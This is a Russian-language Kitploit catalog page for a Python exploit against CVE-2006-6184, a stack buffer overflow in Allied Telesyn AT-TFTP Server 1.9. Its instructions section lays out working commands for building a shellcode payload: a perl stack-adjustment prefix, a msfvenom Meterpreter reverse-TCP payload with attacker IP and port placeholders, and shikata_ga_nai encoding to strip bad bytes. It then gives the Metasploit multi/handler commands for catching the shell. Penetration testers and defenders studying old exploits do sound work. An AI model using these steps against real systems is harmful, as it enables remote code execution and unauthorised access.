Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2006-6184 — Это автономный эксплойт на Python для CVE-2006-6184. Этот эксплойт вызывает переполнение буфера на основе стека в Allied Telesyn TFTP Server (AT-TFTP) 1.9 и, возможно, более ранних версиях, позволяя удаленным злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код. | Kitploit
Инструменты/GitHubGitHub/shauntdergrigorian/cve-2006-6184
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubshauntdergrigorian/cve-2006-6184

cve-2006-6184

Репозиторий
11715 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Это автономный эксплойт на Python для CVE-2006-6184. Этот эксплойт вызывает переполнение буфера на основе стека в Allied Telesyn TFTP Server (AT-TFTP) 1.9 и, возможно, более ранних версиях, позволяя удаленным злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код.

Поделиться

CVE-2006-6184

Это автономный эксплойт на Python для CVE-2006-6184. Данный эксплойт вызывает переполнение буфера на основе стека в Allied Telesyn TFTP Server (AT-TFTP) версии 1.9 и, возможно, более ранних, что позволяет удалённым злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код.

Инструкции (обновлено в 2020 году)

Полезная нагрузка должна быть настроена с вашим IP-адресом и портом прослушивания, поэтому вам нужно сгенерировать её вручную. Для этого выполните следующие шаги:

1.) Введите следующее, чтобы создать hex-файл значения, которое нужно вычесть из указателя стека (3500):

root@kitploit:~
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj

2.) Затем используйте следующую команду для создания многоступенчатой полезной нагрузки meterpreter shell:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload

3.) Затем объедините два только что созданных файла.

root@kitploit:~
cat stackadj payload > shellcode

4.) Наконец, устраним "плохие" символы.

root@kitploit:~
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python

Введите вывод в качестве значения переменной "payload". Возможно, потребуется запустить эксплойт несколько раз, чтобы он сработал.

Прослушиватель Metasploit

  1. use exploit/multi/handler
  2. set PAYLOAD windows/meterpreter/reverse_nonx_tcp
  3. set ExitOnSession false
  4. set AutoRunScript post/windows/manage/migrate
  5. exploit -j
Скачать инструмент